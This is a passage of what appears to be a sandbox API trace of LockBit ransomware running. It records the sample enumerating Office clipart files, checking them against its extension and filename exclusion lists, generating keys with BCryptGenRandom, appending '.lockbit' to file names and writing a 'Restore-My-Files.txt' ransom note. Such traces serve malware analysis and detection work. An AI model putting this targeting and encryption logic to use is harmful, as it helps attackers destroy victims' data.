lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0108.498] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0108.499] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0108.499] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0108.499] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0108.499] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0108.499] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0108.499] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.499] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0108.499] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0108.499] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0108.499] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0108.499] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00262_.WMF") returned 1 [0108.499] lstrcmpiW (lpString1="ntldr", lpString2="BL00262_.WMF") returned 1 [0108.499] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00262_.WMF") returned 1 [0108.499] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00262_.WMF") returned 1 [0108.499] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00262_.WMF") returned -1 [0108.499] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00262_.WMF") returned 1 [0108.499] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00262_.WMF") returned 1 [0108.499] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0108.499] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF") returned=".WMF" [0108.499] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0108.499] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0108.499] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0108.499] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0108.499] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0108.499] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0108.499] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0108.499] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0108.500] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0108.500] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0108.500] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0108.500] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0108.500] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0108.500] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0108.500] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0108.500] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0108.500] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0108.500] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0108.500] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0108.500] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0108.500] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0108.500] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0108.500] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0108.500] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0108.500] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0108.500] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0108.500] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0108.500] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0108.500] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF.lockbit") returned 72 [0108.500] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00262_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0108.502] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0108.502] malloc (_Size=0x40068) returned 0x1ff1e60 [0108.502] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2556) returned 1 [0108.502] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.502] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.502] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0108.502] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.503] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.503] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0108.503] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0108.520] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0108.520] malloc (_Size=0xa6) returned 0x77d800 [0108.520] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0108.520] free (_Block=0x77d800) [0108.520] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00262_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0108.520] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0108.520] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0108.521] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcaca6c00, ftCreationTime.dwHighDateTime=0x1bd4b12, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcaca6c00, ftLastWriteTime.dwHighDateTime=0x1bd4b12, nFileSizeHigh=0x0, nFileSizeLow=0x1678, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00265_.WMF", cAlternateFileName="")) returned 1 [0108.521] lstrcmpiW (lpString1=".", lpString2="BL00265_.WMF") returned -1 [0108.521] lstrcmpiW (lpString1="..", lpString2="BL00265_.WMF") returned -1 [0108.521] PathFindExtensionW (pszPath="BL00265_.WMF") returned=".WMF" [0108.521] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0108.521] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0108.521] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00265_.WMF") returned 1 [0108.522] lstrcmpiW (lpString1="ntldr", lpString2="BL00265_.WMF") returned 1 [0108.522] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00265_.WMF") returned 1 [0108.522] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00265_.WMF") returned 1 [0108.522] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00265_.WMF") returned -1 [0108.522] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00265_.WMF") returned 1 [0108.522] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00265_.WMF") returned 1 [0108.522] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0108.522] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF") returned=".WMF" [0108.522] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0108.522] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0108.522] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0108.523] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0108.523] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0108.523] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0108.523] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0108.523] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0108.523] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0108.523] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0108.523] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0108.523] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0108.523] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0108.523] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0108.523] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0108.523] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0108.523] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0108.523] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0108.523] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0108.523] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0108.523] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0108.523] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0108.523] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0108.523] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF.lockbit") returned 72 [0108.523] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00265_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0108.524] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0108.524] malloc (_Size=0x40068) returned 0x1ff1e60 [0108.524] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5752) returned 1 [0108.524] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.524] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0108.524] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.525] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0108.525] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.531] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0108.531] malloc (_Size=0xa6) returned 0x77d800 [0108.531] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0108.533] free (_Block=0x77d800) [0108.533] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00265_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0108.534] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0108.534] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0108.534] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2253700, ftCreationTime.dwHighDateTime=0x1bd4b1a, ftLastAccessTime.dwLowDateTime=0x5f7031f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf2253700, ftLastWriteTime.dwHighDateTime=0x1bd4b1a, nFileSizeHigh=0x0, nFileSizeLow=0xa54, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00267_.WMF", cAlternateFileName="")) returned 1 [0108.534] lstrcmpiW (lpString1=".", lpString2="BL00267_.WMF") returned -1 [0108.534] lstrcmpiW (lpString1="..", lpString2="BL00267_.WMF") returned -1 [0108.534] PathFindExtensionW (pszPath="BL00267_.WMF") returned=".WMF" [0108.534] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0108.534] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0108.535] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0108.535] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00267_.WMF") returned 1 [0108.535] lstrcmpiW (lpString1="ntldr", lpString2="BL00267_.WMF") returned 1 [0108.535] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00267_.WMF") returned 1 [0108.535] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00267_.WMF") returned 1 [0108.535] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00267_.WMF") returned -1 [0108.535] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00267_.WMF") returned 1 [0108.535] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00267_.WMF") returned 1 [0108.536] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0108.536] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF") returned=".WMF" [0108.536] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0108.536] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0108.536] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0108.536] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF.lockbit") returned 72 [0108.536] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00267_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00267_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0108.537] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0108.537] malloc (_Size=0x40068) returned 0x1ff1e60 [0108.537] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2644) returned 1 [0108.537] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.537] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.537] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0108.537] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 